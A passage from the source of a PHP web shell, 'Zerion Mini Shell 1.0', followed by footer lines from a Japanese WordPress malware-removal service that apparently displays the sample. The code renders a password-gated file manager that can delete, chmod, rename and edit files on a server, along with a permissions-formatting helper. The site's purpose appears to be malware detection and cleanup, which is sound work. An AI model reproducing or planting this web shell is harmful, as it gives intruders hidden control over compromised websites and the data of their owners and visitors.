echo "<tr>\r\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}&pass={$pass}\">{$file}</a></td>\r\n<td><center>" . $size . "</center></td>\r\n<td><center>";
if (is_writable("{$path}/{$file}")) {
echo '<font color="green">';
} elseif (!is_readable("{$path}/{$file}")) {
echo '<font color="red">';
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo '</font>';
}
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}&pass={$pass}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"edit\">Edit</option>\r\n</select>\r\n\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"hidden\" name=\"pass\" value=\"{$pass}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";
}
echo '</table>
</div>';
}
echo '<center><br />Zerion Mini Shell <font color="green">1.0</font></center>
</BODY>
</HTML>';
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
};■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.